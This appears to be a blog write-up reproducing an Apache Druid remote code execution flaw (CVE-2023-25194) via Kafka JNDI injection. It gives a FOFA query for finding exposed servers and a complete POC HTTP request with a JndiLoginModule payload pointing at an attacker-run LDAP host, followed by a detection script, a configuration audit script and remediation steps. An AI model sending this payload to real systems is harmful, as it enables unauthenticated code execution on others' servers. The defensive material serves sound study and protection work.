Apache Druid RCE vulnerability recurrence (QVD-2023-9629)

0x01 Product Introduction

Apache Druid is a high-performance real-time big data analytics engine that supports fast data ingestion, real-time queries and data visualization. It is mainly used in OLAP (Online Analytical Processing) scenarios and can process petabyte-scale data. Druid offers high scalability, low latency and high throughput, and is widely used in real-time monitoring, event-driven analysis, user behavior analysis, network security and other fields. With Druid, enterprises and developers can obtain real-time analysis results quickly and improve decision-making efficiency.

0x02 Vulnerability Overview

When Apache Druid loads data from Apache Kafka, an unauthenticated remote attacker can supply arbitrary Kafka connection properties and thereby exploit CVE-2023-25194 to trigger JNDI injection, ultimately executing arbitrary code. (Other products that use Apache Kafka Connect may also be affected by CVE-2023-25194.)

0x03 Scope of Impact

Affected versions

0.19.0 <= Apache Druid <= 25.0.0

Unaffected versions

Apache Druid >= 26.0.0 (the fixed release has not yet been officially published)

0x04 Reproduction Environment

FOFA syntax: title="Apache Druid"

Version used for reproduction: 24.0.1

0x05 Vulnerability Reproduction

Open the vulnerable environment.

Fill in any characters, click Apply, and capture the request with Burp.

POC:

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1437
Connection: close

{
    "type":"kafka",
    "spec":{
        "type":"kafka",
        "ioConfig":{
            "type":"kafka",
            "consumerProperties":{
                "bootstrap.servers":"1.1.1.1:9092",
                "sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://x.x.x.x\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
            },
            "topic":"any",
            "useEarliestOffset":true,
            "inputFormat":{
                "type":"regex",
                "pattern":"([\\s\\S]*)",
                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
                "columns":[
                    "raw"
                ]
            }
        },
        "dataSchema":{
            "dataSource":"sample",
            "timestampSpec":{
                "column":"!!!_no_such_column_!!!",
                "missingValue":"1970-01-01T00:00:00Z"
            },
            "dimensionsSpec":{

            },
            "granularitySpec":{
                "rollup":false
            }
        },
        "tuningConfig":{
            "type":"kafka"
        }
    },
    "samplerConfig":{
        "numRows":500,
        "timeoutMs":15000
    }
}

Modify the captured request, filling in the URL of your malicious LDAP service at user.provider.url.

Use DNSLog to verify that the vulnerability exists.

The vulnerability exists.
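The request above is easy to recognise on the wire: a POST to the sampler endpoint whose Kafka consumerProperties carry a sasl.jaas.config string that loads JndiLoginModule and points a provider.url at an external LDAP server. The following detection check is an added example written for this post (not code from the original write-up or from the Druid project); it runs offline over constructed request bodies that mirror the POC with the LDAP host replaced by a placeholder, and is shaped so it can be dropped into a WAF rule, a reverse-proxy hook, or a pass over captured HTTP bodies.

```python
"""Flag Druid sampler requests whose Kafka consumerProperties carry a
JNDI-backed JAAS login module (the shape used in the POC above).
Added example; not part of the original write-up."""
import json
import re

# Kafka reads any *.jaas.config property as a JAAS configuration string.
JAAS_KEY_SUFFIX = ".jaas.config"
# The login module abused via CVE-2023-25194: it resolves provider.url with JNDI.
JNDI_MODULE = "JndiLoginModule"
# A JAAS option such as user.provider.url="ldap://..." names the remote lookup target.
PROVIDER_URL = re.compile(
    r'[\w.]*provider\.url\s*=\s*"?(ldap|ldaps|rmi|dns|iiop)://', re.IGNORECASE)

SAMPLER_PATH = "/druid/indexer/v1/sampler"


def is_sampler_request(request_line: str) -> bool:
    """True for 'POST /druid/indexer/v1/sampler[?...] HTTP/1.x'."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    method, target = parts[0], parts[1]
    return method.upper() == "POST" and target.split("?", 1)[0] == SAMPLER_PATH


def find_consumer_properties(obj):
    """Yield every dict stored under a 'consumerProperties' key, at any depth,
    so the check does not depend on the exact nesting of the sampler spec."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key == "consumerProperties" and isinstance(value, dict):
                yield value
            else:
                yield from find_consumer_properties(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from find_consumer_properties(item)


def inspect_sampler_body(body: str) -> list:
    """Return findings for one JSON body; an empty list means nothing suspicious."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    findings = []
    for props in find_consumer_properties(doc):
        for key, value in props.items():
            if not (isinstance(value, str) and key.endswith(JAAS_KEY_SUFFIX)):
                continue
            key_findings = []
            if JNDI_MODULE in value:
                key_findings.append(f"{key} loads {JNDI_MODULE}")
            match = PROVIDER_URL.search(value)
            if match:
                key_findings.append(
                    f"{key} sets a provider.url to {match.group(1).lower()}://")
            # A JAAS string in an unauthenticated sampler call is worth logging
            # even when it is a legitimate SASL/PLAIN or SCRAM login module.
            findings.extend(key_findings or
                            [f"{key} present in sampler consumerProperties"])
    return findings


# Constructed sample bodies (not real traffic). The first mirrors the POC above
# with the attacker's LDAP host replaced by a placeholder.
def _spec(consumer_properties):
    return json.dumps({"type": "kafka", "spec": {"type": "kafka", "ioConfig": {
        "type": "kafka", "consumerProperties": consumer_properties, "topic": "any"}}})


MALICIOUS_BODY = _spec({
    "bootstrap.servers": "192.0.2.10:9092",
    "sasl.mechanism": "SCRAM-SHA-256",
    "security.protocol": "SASL_SSL",
    "sasl.jaas.config": 'com.sun.security.auth.module.JndiLoginModule required '
                        'user.provider.url="ldap://LDAP-PLACEHOLDER/" useFirstPass="true";',
})
LEGIT_SASL_BODY = _spec({
    "bootstrap.servers": "kafka.internal:9093",
    "security.protocol": "SASL_SSL",
    "sasl.mechanism": "PLAIN",
    "sasl.jaas.config": 'org.apache.kafka.common.security.plain.PlainLoginModule required '
                        'username="druid" password="REDACTED";',
})
BENIGN_BODY = _spec({"bootstrap.servers": "kafka.internal:9092",
                     "security.protocol": "PLAINTEXT"})

if __name__ == "__main__":
    for name, body in (("malicious", MALICIOUS_BODY),
                       ("legit-sasl", LEGIT_SASL_BODY), ("benign", BENIGN_BODY)):
        print(name, "->", inspect_sampler_body(body) or "clean")
```

The check deliberately keys on the login module and the provider.url rather than on the LDAP host, since the host is whatever the attacker controls; a legitimate SASL module still produces a low-severity finding, because a JAAS string arriving in an unauthenticated sampler call is unusual enough to log. Pair it with the request-line check so only the sampler endpoint is inspected.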

0x06 Remediation

Security update

At present, Apache Druid has fixed this vulnerability upstream, but a release containing the fix has not been officially published. Users can download the source code and compile it themselves.

Users should watch for the official release of the new Apache Druid version and update promptly.

Reference: https://github.com/apache/druid/tree/26.0.0

Mitigation

1. Enable authentication configuration for Apache Druid.

For details, please see: https://druid.apache.org/docs/latest/development/extensions-core/druid-basic-security.html

2. Move Apache Druid to the intranet if the business permits.
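Mitigation 1 is only effective if the basic-security extension is actually loaded and an authenticator chain is configured; a deployment that copies half of the documented snippet still serves the sampler endpoint anonymously. The audit script below is an added example (not from the original post or the Druid project) that reads a common.runtime.properties file and reports what is missing. The property names follow the druid-basic-security documentation linked above; treat the exact keys as an assumption and verify them against the docs for your Druid version. Both configurations in the block are constructed for illustration.

```python
"""Audit a Druid common.runtime.properties for mitigation 1 above:
is druid-basic-security loaded and is an authenticator chain configured?
Added example, not from the original post. Property names follow the
druid-basic-security docs (assumption: verify against your Druid version)."""
import json


def parse_properties(text: str) -> dict:
    """Minimal Java .properties reader: key=value lines, '#'/'!' comments,
    no line continuations or escapes (enough for common.runtime.properties)."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def _json_list(props: dict, key: str) -> list:
    """Druid stores list-valued properties as JSON arrays, e.g. ["a","b"]."""
    try:
        value = json.loads(props.get(key, "[]"))
    except json.JSONDecodeError:
        return []
    return value if isinstance(value, list) else []


def audit_auth(props: dict) -> list:
    """Return a list of problems; an empty list means authentication is configured."""
    issues = []
    if "druid-basic-security" not in _json_list(props, "druid.extensions.loadList"):
        issues.append("druid-basic-security is not in druid.extensions.loadList")
    chain = _json_list(props, "druid.auth.authenticatorChain")
    if not chain:
        issues.append("druid.auth.authenticatorChain is unset: every endpoint, "
                      "the sampler included, accepts anonymous requests")
    for name in chain:
        auth_type = props.get(f"druid.auth.authenticator.{name}.type")
        if auth_type != "basic":
            issues.append(f"authenticator {name} has type {auth_type!r}, expected basic")
    authorizers = _json_list(props, "druid.auth.authorizers")
    if not authorizers:
        issues.append("druid.auth.authorizers is unset")
    for name in authorizers:
        if props.get(f"druid.auth.authorizer.{name}.type") == "allowAll":
            issues.append(f"authorizer {name} is allowAll: any authenticated user can do anything")
    if props.get("druid.escalator.type") != "basic":
        issues.append("druid.escalator.type is not basic: internal Druid-to-Druid "
                      "requests would fail once authentication is enforced")
    return issues


# Constructed configurations. WEAK_CONFIG is what an exposed default-style
# deployment looks like; HARDENED_CONFIG enables basic authentication.
# CHANGE-ME values are placeholders, not real credentials.
WEAK_CONFIG = """
druid.extensions.loadList=["druid-kafka-indexing-service"]
druid.host=druid.example
"""

HARDENED_CONFIG = """
druid.extensions.loadList=["druid-kafka-indexing-service","druid-basic-security"]
druid.auth.authenticatorChain=["MyBasicMetadataAuthenticator"]
druid.auth.authenticator.MyBasicMetadataAuthenticator.type=basic
druid.auth.authenticator.MyBasicMetadataAuthenticator.initialAdminPassword=CHANGE-ME
druid.auth.authenticator.MyBasicMetadataAuthenticator.initialInternalClientPassword=CHANGE-ME
druid.auth.authenticator.MyBasicMetadataAuthenticator.credentialsValidator.type=metadata
druid.auth.authenticator.MyBasicMetadataAuthenticator.skipOnFailure=false
druid.auth.authenticator.MyBasicMetadataAuthenticator.authorizerName=MyBasicMetadataAuthorizer
druid.escalator.type=basic
druid.escalator.internalClientUsername=druid_system
druid.escalator.internalClientPassword=CHANGE-ME
druid.escalator.authorizerName=MyBasicMetadataAuthorizer
druid.auth.authorizers=["MyBasicMetadataAuthorizer"]
druid.auth.authorizer.MyBasicMetadataAuthorizer.type=basic
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, "->", audit_auth(parse_properties(cfg)) or "ok")
```

Run it against the file each Druid process actually reads (the extension must be loaded on every node, not only the Router), and combine it with mitigation 2: authentication closes the unauthenticated path this post describes, while keeping the cluster off the public internet limits who can reach the sampler at all.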


Source: blog.csdn.net/qq_41904294/article/details/130379299